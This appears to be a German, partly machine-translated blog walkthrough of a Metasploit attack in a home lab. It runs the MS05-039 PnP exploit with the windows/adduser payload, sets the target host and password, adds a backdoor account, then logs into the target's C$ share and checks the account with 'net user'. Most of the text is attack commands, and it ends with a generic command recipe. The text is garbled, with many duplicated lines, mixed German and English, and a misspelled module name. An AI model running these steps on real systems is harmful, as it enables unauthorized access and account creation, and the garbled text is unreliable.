Demonstriert wird dies in meinem Security-Labor
Der Angreifer Computer ist 192.168.1.9 (Linux Backtrack 4)
Der Ziel-Rechner wird 192.168.1.10
Der Angreifer Computer ist 192.168.1.9 (Linux Backtrack 4)
Der Ziel-Rechner wird 192.168.1.10
den ersten Befehl, der in die Shell eingegeben wird, ist
zeige Exploits** show exploits
zeige Exploits** show exploits
Dieser Befehl zeigt alle Exploits, die vom Angreifer verwendet werden können. In diesem Fall wird der Angreifer das
ms05_039_pnp Exploit auszunutzen.Der Befehl zum Einsatz des Exploit
** use ms_035_pnpDrücken Sie ENTER und das Exploit wird verwendet. Nun werden wir sehen, was das Exploit kann. das Exploit wird nun Fragen
** use ms_035_pnpDrücken Sie ENTER und das Exploit wird verwendet. Nun werden wir sehen, was das Exploit kann. das Exploit wird nun Fragen
tragenSie diesen Befehl ein
** show payloads Drücken Sie auf ENTER und alle
payloads werden dem Angreifer gezeigt werden. In diesem Fall wird der Angreifer , einen neuen Benutzer an den Slave-Computer hinzufügen. Der Befehl, dafür, ist ** show payloads Drücken Sie auf ENTER und alle
** set payload windows/adduser Drücken Sie auf ENTER und das payload wird verwendet werden. Das nächste, was der Angreifer tun muss, ist das Ziel vorgegeben. Der Angreifer muss nun mit diesem Befehl die Zielliste anzeigen lassen.
** show targets
Nachdem der Angreifer hat das Ziel bestimmen, ist die nächste Sache, um das Ziel gesetzt. Der Befehl, der benutzt werden kann, ist
das Ziel setzen, mit 0
das Ziel setzen, mit 0
** set target 0
Die Nummer wird dem Slave Betriebssystem zugeordnet. Die nächsten Schritte werden zeigen, dass die Felder zu füllen durch den Angreifer. Der nächste Befehl soll die Optionen anzeigen.
** show options Es werden leere Felder sein , die vom Angreifer gefüllt werden müssen.
In diesem Fall sind die leeren Felder RHOST und PASS. RHOST steht für Remote Host (Slave-IP-Adresse).
PASS steht für Password. für beides, sind die Befehle
** set RHOST 192.168.1.10
** set PASS 12345
PASS steht für Password. für beides, sind die Befehle
** set RHOST 192.168.1.10
** set PASS 12345
Der Angreifer setzt damit den Remote-Host.
Der Angreifer setzt auch das Passwort. Schließlich ist der letzte Befehl, der verwendet werden muss
um das Exploit zu nutzen.
Der Angreifer setzt auch das Passwort. Schließlich ist der letzte Befehl, der verwendet werden muss
um das Exploit zu nutzen.
** exploit Der Exploit-Befehl das Metasploit aufrufen , um den Angriff auf den Slave zu starten. Drücken Sie ENTER und Metasploit startet den Angriff. Nun weiss der Angreifer, dass er ein Konto bei der Slave-Maschine hat. Konto-Informationen:
username = Metasploit
password = 12345 Nun ist es Zeit für den Angreifer, die Slave Maschine zu benutzen . Der Angreifer öffnet sich ein Dialogfenster Ausführen. Im Feld "Ausführen", wird das Ziel eingegeben
** \\192.168.1.10\c$
username = Metasploit
password = 12345 Nun ist es Zeit für den Angreifer, die Slave Maschine zu benutzen . Der Angreifer öffnet sich ein Dialogfenster Ausführen. Im Feld "Ausführen", wird das Ziel eingegeben
** \\192.168.1.10\c$
ENTER drücken und einen Login-Prompt erscheint. Angreifer muss den Benutzernamen und das Passwort für die Slave-Maschine eingeben. In diesem Fall sind Benutzername und Passwort Metasploit und 12345.
Drücken Sie ENTER, und der Angreifer ist in der Slave-Maschine
The above picture shows that the attacker is in the C drive of slave machine.What can a slave see on his machine?If the slave launch a Command Prompt and type in
** net userThe result will be
** net userThe result will be
Das obige Bild zeigt, dass den Angreifer im C-Laufwerk der Slave Maschine ist. Was kann ein Sklave auf seiner Maschine zu sehen? Wenn der Slave startetbekommen Sie eine Eingabeaufforderung, und geben ein.
** net userDas Ergebnis wird
** net userDas Ergebnis wird
Siehst du das? Der Benutzername "Metasploit" ist da. Das ist der Benutzername, dass der Angreifer erstellt. Die Befehle, die ich benutzt habe:
** show exploits
** use EXPLOITNAME
** show payloads
** set payload PAYLOADNAME
** show targets
** set target TARGETNUMBER
** show options
** set RHOST IPADDRESS
** exploit
** show exploits
** use EXPLOITNAME
** show payloads
** set payload PAYLOADNAME
** show targets
** set target TARGETNUMBER
** show options
** set RHOST IPADDRESS
** exploit
0 Kommentare:
Kommentar veröffentlichen